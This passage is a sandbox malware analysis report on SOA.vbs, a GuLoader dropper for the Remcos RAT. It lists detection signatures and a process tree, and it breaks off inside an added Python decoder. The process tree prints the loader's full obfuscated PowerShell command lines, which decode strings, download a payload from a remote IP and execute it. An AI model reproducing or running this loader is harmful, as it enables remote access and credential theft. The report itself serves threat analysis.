
Windows Analysis Report
SOA.vbs

Overview

General Information

Sample name: SOA.vbs
Analysis ID: 1465862
MD5: 67e1e122a412c456946e5206247a92eb
SHA1: 7262d0ebf405ce41c1000d6e3940099cdb0b8e4b
SHA256: 68796e148be21fcce665281ce32941c6be58028befb85b7789253dfde8d9e68e
Tags: GuLoader, RAT, RemcosRAT, vbs

Detection

Remcos, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Process Tree

  • System is w10x64
  • wscript.exe (PID: 768 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. 
Arkivk/StoreslcInsu pa Futur m$MessersBBaghaano,innaclmIndeterbSkolegaeStikkess Hopkint .oktoroPatchi pUtilregp,amsinge Dispost arinasenkelhe)Dibutyr ');Illish (fyrstendmme 'Smoking$ Re,ultgPhosph.lOutswiroCyclusgbvalenceaNo,dendlM cetoz: Bru erCagonisei S.ddelrNsevrdis LavfalisemitertFor.ftehIndkoms2 Produk0Sommerf0Renteko=Uprcise$DebentuB MormoneDronninsSynkrospSnubbisa Driv ukRadioake Aquavi.RacistesBurblinpGront elFlor.neiCha.aeptUspoken(Frstega$E.ectroDMolervreMartelbuMa.ionetSandeleoinconsuxMiljstti Madpakd kudenseUdbryde) Chaper ');Illish (fyrstendmme 'Bestraa[Se tienNVentilee Inspirt Pedime.Rr,lsevS Br.steeIndbyggrCitificvS.umkvaiAr,ejdscV,nvitteRicinelPKoleriko tndstii U.opian SutrastNormeriM,ekapitaFangernnFirmamraNephrodgAnisbole sammenr C,rkel]Snea,in: Totali:Mo finiS TytheieAmac atcTektit.uG ossopr TelestiD ellintMikraesyRefri ePUerholdrPaucispoHapsendtirrepaioPalatogc T.berioMorgenpl,atarbf Ma.ning=Bernetk Entire[ PotensNLangspyeOpfindetFromber.Jugeme,SSrkendeeSmaaforc TilsaeuCorindorBroka.ei Ilde ttOver,lyyLati,skPClive,er,orlagsoScattert Misinfohav,nenc Gledesokr.nragl ,lhambTPersienybottonhpNe rusteEpigram]Grundfl:Pi fleo:FarveskTRegnskalAutomo sSpaniol1Ddsstra2Hearts ');$Bespake=$Cirsith200[0];$Retransfigure= (fyrstendmme 'Afvundn$PrefrozgPreswall.undhedoMover.sbHyperalaUdbedrel In.fly:Rep.ginNXiphioiaSvovlagtLogfilesSma,lmikFreckpaiBeta,kef Lasca tSub endeAlarman=RechallN ,armoneRevurd,wLarrupe-Ex,itesOSynkfrdbMul,iapjBe rifteRegnskac.ackscatkarvesp IndefinSQuintupyBefi tes Flunk t Blemosefeazi gmVi.rlin. 
kalebsNselvlrteGldspostS ndpil.FelicitWYeasttiebedreafbWikenocCNongenulNoemataiGr.msereRe.ucernRatheant');$Retransfigure+=$Debater[1];Illish ($Retransfigure);Illish (fyrstendmme ' cypres$AromastNMidtpuna Sl,tdit KildetsDedicatk godskriFidsforfzees irt Prythee erg no.spraintHDeproceeBrandhra N,ughtdFelt ave.rthroprOverskus Imper,[Krigsst$ Dej soS .abrapoPrd.katrRusk rstsknsomteFlagitarPeripapifantasinFordoblgFourageeAmiglobn Thubans Sorted]Caremep=Hybridi$C llyinOSlipbanpIngel shAdrenaloPin.ettlSclaffed ScutulsDesiders Bes.fttre olubuAdvenaeeTrkkernrVegetatn.edsageeMasseresRamning ');$Tragacanthin=fyrstendmme 'Dagpeng$StemmebNSportsiaFrstevitHypnogesLadysnok edelseiUnplurafoejnenetElsassieHawkbil.ValentiD NarcotoHoveds,wMarksmanWorrieclAb,liceoSig,ejnaRecitemdMediterFSkandkki oncordl Slu bee sportd(G gossa$Asse aiB igismemisanths Roke.ip Hubbuba .usenekLaniereeU kyldf,Nglenpi$TredeltU Nonspeh Efte,sjFr.madslL.linespBoltesfeTilbag.lAkantusiPleone gUnderrusSterilitAlko,eseR.dicol)L antag ';$Uhjlpeligste=$Debater[0];Illish (fyrstendmme 'p rtesp$Whamb egWhippetlDiaspidoAntabusbAparthea Apsidcl Heli,p:OotocoiKUnratior UforskiEgernelmGymnonoiCand lanAnmodenaIm ropelDi.featiDusine sFilologtAnderumiKkkenmascymbocekExcoriaeK ralla=Smoulde(DarkerpTVichamoeCalcul,sMagnetotBehften- B.mandPBiomagnaSkrunint.ulekalh V gest Ha,ties$ce.tralUMadannohStteskij Ladyisl Ry kerpRecedeveMetapsylRadbrkkiS,ipulagLillepusdemyelitArbejdse Kom.ro)Diament ');while (!$Kriminalistiske) {Illish (fyrstendmme 'Forn.te$G sandtg IncitolAnstil oAstronab Laanena Galoppluhjlpso:O.nsgraUPlanfuldOdinitilFyraftebAustromsanko strTroug.seWhoreman InddtedRenommveSpasmag= Albain$LydinfotAnkeinsrAabninguDroemmee Carlse ') ;Illish $Tragacanthin;Illish (fyrstendmme 'UnpurifSBestykntOu.givea rundkurAspid.btBybudep-MnemoteSGarbsbel,aischaeFarfarseGadeuorpthermo, Unana y4Dativob ');Illish (fyrstendmme 'Udve.sl$Bul,endg rthantl B,arhioAntimetb ,ackveaEremuril Depres: ravestK 
RkebisrJulemrkiHalefjemNedg,aviSki.engnForsk.easubsphelSeign,oiSpectr sHasardatp,ognosiBeskedes SuspenkCompassestanisl=Sortb s(Overst,T UnsopheSigtelisBistadetWagoner-U,gangsPVa gneta SlumretTies.ethhenvejr Plkkene$Sj sstyU gtenhehBjennatjPracticlFyrfad,pAf.raadePhenazilFilinfoiUn.upergIndivids UnmythtSkraakaeNihili,)Eksport ') ;Illish (fyrstendmme 'donnaen$spytki.glymphotlRecip,ooNeptunebFashiouaExcellelApproks:Euorthos .udevoi TmmerflCiboltrv ,nbrute con,eyr BrdskrrSprinteoAt.ainedJernind=Banovin$Petitiog Skivebl LeekbuoModes gbKnhjtroaBankboglFli,esu:No,inerA ConsopsIndstnisMedansviDishingmtridermiSuggestlC,elatoeUngtelirKlientpi Dak,ylnunhelefgBemuzz.s,ammens+,critud+Dis,rra%Enbus.h$ ActinoC.kspresiVesttysr UnhabisHyldeb,iP.chydetUnlive h S nsto2Dyrekl.0 Tapets0 Ljetgo.B drvelcChloro,o AccorduDiskettn HjuledtOl ebil ') ;$Bespake=$Cirsith200[$silverrod];}$Lysimeters=302269;$Descantist115=28958;Illish (fyrstendmme 'Alfanum$ AforetgFlor.uklIndl nioF briksbophvelsaEnt rozlDomesti:AccustoTFama.ourgrydereo.hitiesmPerversmSjaler,eOrometrsilinasiaEivinkolTophscosRetsl.km Laase.aLonesoml BuffooeKaloprirManicuri chaira Datast=Obligat MellemhGlejesveehaineprtDiazino- Bi,lioCProconvoUnfoun nHomoeottBan voleBrai.wonRenkultt debora Astr.am$ Uns ufU C,bbaghEntrailjHoarseslAbra ampIndtrree afstemlPhotogriCh.ntzigIrratios Bar.artDrumloieEjendom ');Illish (fyrstendmme ' Byguer$Illustrg In,iollEmotionoSters,ybUdarm taUndergrlOveratt:BejewelSSt.llbipPosteksuBegitnimEndimeniStrningnTetran.g Upgang honekal= Remine Routous[Bi.peviSUdskamnySttterns FusiletGreenlae VestprmPei,eds.p stiesCDeputatoSidd,isnNeure.tv PatrioeB,rgravrFedderot E.eabl]Wallowi:B echan:Co,tipuFMellem,rCoursh.o P dikam GttevrBTungsinaP rsongsGrnsesfeBedownb6 B neps4PunitioS ParadotOutputfr Vandvai PlesionBilledvg Sa,cha(Ov.gene$sportelTStjfrierSystemboOldkirkmTrompetm erugineForbr rsappelsiaFatuit,lVendepusVandlovmOpkoblia NumberlExocr.nePri,ecorSjlehaliCouvade)Lnprobl ');Illish (fyrstendmme ' 
.iljkr$KubaanagKlorerelBasisbooAab.nthb M gacyaPreelecl Konc,r:AllotriJDistriboTrforaru Ch,kerrT.rarulnTetr,kiaSorterfl ,mplumnPopglovuG,ootysmForesprmUndissueOprenserExecrateBilliggtFiksere Jo dtil=Neutral Refract[SkruetrSOceanfryPejlekos irginatArchaeoef jeblam Design.AfmalenTSoodlete indkasx itziat Feoff..DokumenEUdka tnn C.nodicDe,eteroDe.enerd djustii ZonelonReperf g antime]Domsafs:Immodes:PlaceriAAmbite,SRa.hideC SkulpeIFremmedIRamrodd.Publi.eGMunkekueDahoo.stZonit dSToluidstOctileursemieggiNovelisnbl ndingAtre at( Amygda$SkovlvoSLactescpServituuAnnoncemBrugereiUncalornUnplundg Predet)Ma,dsmo ');Illish (fyrstendmme 'Beatega$AffinitgUdmaalal mningsoSquirkubHypobasaSkotjsalActualn:EsserslG GnetumesolsejlnKabine.ndizorgae StandemMonobuts ildfasiSpeci.lgOmentostFetereniYngelplgFestkl.t,ugerma=Bu,ging$ RaaklaJbov.endoBrugerku.uckerirNitterenKommu,iaSeapooslMlkevejnBoligblu U.estem ensnarmRegisteekatiposr.lvsnoreTrigamitMerchan.T bulaesBitniveu Maran bCharleys,issiontLysre urAfbarkeiSchatt.n,etrolag .iquor(Gonobla$CirculiLVe blesyFadervosLucin,ci Orifacm AnaceseUndlivetGen emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3496 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 5512 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. 
Arkivk/StoreslcInsu pa Futur m$MessersBBaghaano,innaclmIndeterbSkolegaeStikkess Hopkint .oktoroPatchi pUtilregp,amsinge Dispost arinasenkelhe)Dibutyr ');Illish (fyrstendmme 'Smoking$ Re,ultgPhosph.lOutswiroCyclusgbvalenceaNo,dendlM cetoz: Bru erCagonisei S.ddelrNsevrdis LavfalisemitertFor.ftehIndkoms2 Produk0Sommerf0Renteko=Uprcise$DebentuB MormoneDronninsSynkrospSnubbisa Driv ukRadioake Aquavi.RacistesBurblinpGront elFlor.neiCha.aeptUspoken(Frstega$E.ectroDMolervreMartelbuMa.ionetSandeleoinconsuxMiljstti Madpakd kudenseUdbryde) Chaper ');Illish (fyrstendmme 'Bestraa[Se tienNVentilee Inspirt Pedime.Rr,lsevS Br.steeIndbyggrCitificvS.umkvaiAr,ejdscV,nvitteRicinelPKoleriko tndstii U.opian SutrastNormeriM,ekapitaFangernnFirmamraNephrodgAnisbole sammenr C,rkel]Snea,in: Totali:Mo finiS TytheieAmac atcTektit.uG ossopr TelestiD ellintMikraesyRefri ePUerholdrPaucispoHapsendtirrepaioPalatogc T.berioMorgenpl,atarbf Ma.ning=Bernetk Entire[ PotensNLangspyeOpfindetFromber.Jugeme,SSrkendeeSmaaforc TilsaeuCorindorBroka.ei Ilde ttOver,lyyLati,skPClive,er,orlagsoScattert Misinfohav,nenc Gledesokr.nragl ,lhambTPersienybottonhpNe rusteEpigram]Grundfl:Pi fleo:FarveskTRegnskalAutomo sSpaniol1Ddsstra2Hearts ');$Bespake=$Cirsith200[0];$Retransfigure= (fyrstendmme 'Afvundn$PrefrozgPreswall.undhedoMover.sbHyperalaUdbedrel In.fly:Rep.ginNXiphioiaSvovlagtLogfilesSma,lmikFreckpaiBeta,kef Lasca tSub endeAlarman=RechallN ,armoneRevurd,wLarrupe-Ex,itesOSynkfrdbMul,iapjBe rifteRegnskac.ackscatkarvesp IndefinSQuintupyBefi tes Flunk t Blemosefeazi gmVi.rlin. 
kalebsNselvlrteGldspostS ndpil.FelicitWYeasttiebedreafbWikenocCNongenulNoemataiGr.msereRe.ucernRatheant');$Retransfigure+=$Debater[1];Illish ($Retransfigure);Illish (fyrstendmme ' cypres$AromastNMidtpuna Sl,tdit KildetsDedicatk godskriFidsforfzees irt Prythee erg no.spraintHDeproceeBrandhra N,ughtdFelt ave.rthroprOverskus Imper,[Krigsst$ Dej soS .abrapoPrd.katrRusk rstsknsomteFlagitarPeripapifantasinFordoblgFourageeAmiglobn Thubans Sorted]Caremep=Hybridi$C llyinOSlipbanpIngel shAdrenaloPin.ettlSclaffed ScutulsDesiders Bes.fttre olubuAdvenaeeTrkkernrVegetatn.edsageeMasseresRamning ');$Tragacanthin=fyrstendmme 'Dagpeng$StemmebNSportsiaFrstevitHypnogesLadysnok edelseiUnplurafoejnenetElsassieHawkbil.ValentiD NarcotoHoveds,wMarksmanWorrieclAb,liceoSig,ejnaRecitemdMediterFSkandkki oncordl Slu bee sportd(G gossa$Asse aiB igismemisanths Roke.ip Hubbuba .usenekLaniereeU kyldf,Nglenpi$TredeltU Nonspeh Efte,sjFr.madslL.linespBoltesfeTilbag.lAkantusiPleone gUnderrusSterilitAlko,eseR.dicol)L antag ';$Uhjlpeligste=$Debater[0];Illish (fyrstendmme 'p rtesp$Whamb egWhippetlDiaspidoAntabusbAparthea Apsidcl Heli,p:OotocoiKUnratior UforskiEgernelmGymnonoiCand lanAnmodenaIm ropelDi.featiDusine sFilologtAnderumiKkkenmascymbocekExcoriaeK ralla=Smoulde(DarkerpTVichamoeCalcul,sMagnetotBehften- B.mandPBiomagnaSkrunint.ulekalh V gest Ha,ties$ce.tralUMadannohStteskij Ladyisl Ry kerpRecedeveMetapsylRadbrkkiS,ipulagLillepusdemyelitArbejdse Kom.ro)Diament ');while (!$Kriminalistiske) {Illish (fyrstendmme 'Forn.te$G sandtg IncitolAnstil oAstronab Laanena Galoppluhjlpso:O.nsgraUPlanfuldOdinitilFyraftebAustromsanko strTroug.seWhoreman InddtedRenommveSpasmag= Albain$LydinfotAnkeinsrAabninguDroemmee Carlse ') ;Illish $Tragacanthin;Illish (fyrstendmme 'UnpurifSBestykntOu.givea rundkurAspid.btBybudep-MnemoteSGarbsbel,aischaeFarfarseGadeuorpthermo, Unana y4Dativob ');Illish (fyrstendmme 'Udve.sl$Bul,endg rthantl B,arhioAntimetb ,ackveaEremuril Depres: ravestK 
RkebisrJulemrkiHalefjemNedg,aviSki.engnForsk.easubsphelSeign,oiSpectr sHasardatp,ognosiBeskedes SuspenkCompassestanisl=Sortb s(Overst,T UnsopheSigtelisBistadetWagoner-U,gangsPVa gneta SlumretTies.ethhenvejr Plkkene$Sj sstyU gtenhehBjennatjPracticlFyrfad,pAf.raadePhenazilFilinfoiUn.upergIndivids UnmythtSkraakaeNihili,)Eksport ') ;Illish (fyrstendmme 'donnaen$spytki.glymphotlRecip,ooNeptunebFashiouaExcellelApproks:Euorthos .udevoi TmmerflCiboltrv ,nbrute con,eyr BrdskrrSprinteoAt.ainedJernind=Banovin$Petitiog Skivebl LeekbuoModes gbKnhjtroaBankboglFli,esu:No,inerA ConsopsIndstnisMedansviDishingmtridermiSuggestlC,elatoeUngtelirKlientpi Dak,ylnunhelefgBemuzz.s,ammens+,critud+Dis,rra%Enbus.h$ ActinoC.kspresiVesttysr UnhabisHyldeb,iP.chydetUnlive h S nsto2Dyrekl.0 Tapets0 Ljetgo.B drvelcChloro,o AccorduDiskettn HjuledtOl ebil ') ;$Bespake=$Cirsith200[$silverrod];}$Lysimeters=302269;$Descantist115=28958;Illish (fyrstendmme 'Alfanum$ AforetgFlor.uklIndl nioF briksbophvelsaEnt rozlDomesti:AccustoTFama.ourgrydereo.hitiesmPerversmSjaler,eOrometrsilinasiaEivinkolTophscosRetsl.km Laase.aLonesoml BuffooeKaloprirManicuri chaira Datast=Obligat MellemhGlejesveehaineprtDiazino- Bi,lioCProconvoUnfoun nHomoeottBan voleBrai.wonRenkultt debora Astr.am$ Uns ufU C,bbaghEntrailjHoarseslAbra ampIndtrree afstemlPhotogriCh.ntzigIrratios Bar.artDrumloieEjendom ');Illish (fyrstendmme ' Byguer$Illustrg In,iollEmotionoSters,ybUdarm taUndergrlOveratt:BejewelSSt.llbipPosteksuBegitnimEndimeniStrningnTetran.g Upgang honekal= Remine Routous[Bi.peviSUdskamnySttterns FusiletGreenlae VestprmPei,eds.p stiesCDeputatoSidd,isnNeure.tv PatrioeB,rgravrFedderot E.eabl]Wallowi:B echan:Co,tipuFMellem,rCoursh.o P dikam GttevrBTungsinaP rsongsGrnsesfeBedownb6 B neps4PunitioS ParadotOutputfr Vandvai PlesionBilledvg Sa,cha(Ov.gene$sportelTStjfrierSystemboOldkirkmTrompetm erugineForbr rsappelsiaFatuit,lVendepusVandlovmOpkoblia NumberlExocr.nePri,ecorSjlehaliCouvade)Lnprobl ');Illish (fyrstendmme ' 
.iljkr$KubaanagKlorerelBasisbooAab.nthb M gacyaPreelecl Konc,r:AllotriJDistriboTrforaru Ch,kerrT.rarulnTetr,kiaSorterfl ,mplumnPopglovuG,ootysmForesprmUndissueOprenserExecrateBilliggtFiksere Jo dtil=Neutral Refract[SkruetrSOceanfryPejlekos irginatArchaeoef jeblam Design.AfmalenTSoodlete indkasx itziat Feoff..DokumenEUdka tnn C.nodicDe,eteroDe.enerd djustii ZonelonReperf g antime]Domsafs:Immodes:PlaceriAAmbite,SRa.hideC SkulpeIFremmedIRamrodd.Publi.eGMunkekueDahoo.stZonit dSToluidstOctileursemieggiNovelisnbl ndingAtre at( Amygda$SkovlvoSLactescpServituuAnnoncemBrugereiUncalornUnplundg Predet)Ma,dsmo ');Illish (fyrstendmme 'Beatega$AffinitgUdmaalal mningsoSquirkubHypobasaSkotjsalActualn:EsserslG GnetumesolsejlnKabine.ndizorgae StandemMonobuts ildfasiSpeci.lgOmentostFetereniYngelplgFestkl.t,ugerma=Bu,ging$ RaaklaJbov.endoBrugerku.uckerirNitterenKommu,iaSeapooslMlkevejnBoligblu U.estem ensnarmRegisteekatiposr.lvsnoreTrigamitMerchan.T bulaesBitniveu Maran bCharleys,issiontLysre urAfbarkeiSchatt.n,etrolag .iquor(Gonobla$CirculiLVe blesyFadervosLucin,ci Orifacm AnaceseUndlivetGen emseTilgr nrYv,rfics Omnipr,Sh,rrie$NaologiD La,ineeU,fladnsInelastcOpsatseaForholdnProkurat RecarbirussecosUnderkat Observ1 Massep1Betterg5S ovene)e sinfe ');Illish $Gennemsigtigt;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2724 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1096 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wab.exe (PID: 5008 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 5060 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 6116 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
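The PowerShell command line above is one decoder function plus a few dozen obfuscated string literals. The helper `fyrstendmme` (the sample's own name) keeps every 8th character of its argument and discards the seven junk characters before it, which are fragments of Danish and English dictionary words; `Illish` then dot-sources whatever was decoded through `iex`. The stride is only switched on when `${host}.CurrentCulture` is truthy (`$Fightet` goes from undefined to 1), so a host object without that property decodes every literal to an empty string, a cheap check against non-standard hosts. The decoder below is an added example written for this page, not code from the report or from Joe Sandbox. The literals it carries are copied verbatim from the PID 3516 command line; the values it produces are the decoder's output and are not strings the report lists anywhere. One caveat: the report's copy of the first literal (the User-Agent string) goes out of phase after 43 groups of eight, so the excerpt stops it there; the other four decode cleanly, and the cmd.exe one can be checked against the `echo %appdata%\Dobbeltrudens140.Aff && echo t` child process in the tree.

```python
"""Decoder for the PowerShell string obfuscation used by the SOA.vbs loader stage.

Added example, not code from the report. The helper it ports is defined at the start
of the powershell.exe command line in the process tree (names kept from the sample):

    If (${host}.CurrentCulture) {$Fightet++;}
    Function fyrstendmme($s){ $n=$s.Length-$Fightet;
        For($i=7; $i -lt $n; $i+=8){ $out+=$s.Substring($i,$Fightet) }; $out }
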